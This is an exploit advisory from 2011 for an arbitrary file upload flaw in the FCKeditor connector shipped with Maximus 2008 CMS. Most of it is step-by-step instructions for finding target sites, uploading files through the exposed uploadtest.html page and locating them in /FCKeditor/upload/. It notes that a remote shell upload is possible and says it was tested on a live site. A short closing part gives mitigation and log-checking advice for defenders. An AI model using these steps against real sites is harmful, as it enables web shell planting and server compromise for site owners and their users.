#################################################################### maximus-cms (fckeditor) Arbitrary File Upload Vulnerability #################################################################### ____ __ __ __ /\ _`\ /\ \ __ /\ \__/\ \ \ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __ \ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\ \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/ \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\ \/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/ /\____/ \_/__/ __ __ __ ______ Author:eidelweiss /\ \ __/\ \ /\ \ /\ _ \ \ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____ \ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\ \ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\ \ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/ '\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/ \ \_\ \ \_\ \/_/ \/_/ | | /|_________________________________________________________________________|\ / \ /===============================================================================\ |Exploit Title: maximus-cms (fckeditor) Arbitrary File Upload Vulnerability | |develop: http://www.php-maximus.org | |Download: http://ftp1.toocharger.com/scgdnLI/maximus-cms-2008_5129.zip | |Version: Maximus 2008 CMS: Web Portal System (v.1.1.2) | |Tested On: Live site | |Dork: use your skill and play your imagination :P | |Author: eidelweiss | |contact: eidelweiss[at]windowslive[dot]com | |Home: http://www.eidelweiss.info | | | | | \===============================================================================/ / NOTHING IMPOSSIBLE IN THIS WORLD EVEN NOBODY`s PERFECT \ --------------------------------------------------------------------------------- |============================================================================================| |Original advisories: | 
|http://eidelweiss-advisories.blogspot.com/2011/01/maximus-cms-fckeditor-arbitrary-file.html |
|============================================================================================|

exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html

[!] first find the target host
ex: www.site.com or www.target.com/maximus
then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#

[!] select # "php" as "File Uploader" to use... and select "file" as Resource Type

[!] Upload There Hacked.txt or whatever.txt And Copy the Output Link or

[!] after upload without any errors your file will be here: /FCKeditor/upload/
ex: http://site.com//FCKeditor/upload/whatever.txt

NB: remote shell upload also possible !!!

Read the config.php file in "/FCKeditor/editor/filemanager/connectors/php/"

----------
$Config['Enabled'] = true ; // <=
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/FCKeditor/upload/' ;
----------

and also $Config['AllowedExtensions']['File']

With the default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code, because file names with multiple extensions are not properly checked.
The upload connector answers these requests only because $Config['Enabled'] is set to true (the line marked "<=" above). On a deployed site, set it to false or put the connector behind the CMS login, remove the uploadtest.html test page, and make sure nothing under /FCKeditor/upload/ is executed as PHP.
Requests for the connectors/ path in the web server log and unexpected files in /FCKeditor/upload/ are the things to check on an installation that shipped with this configuration.

=========================| -=[ E0F ]=- |=================================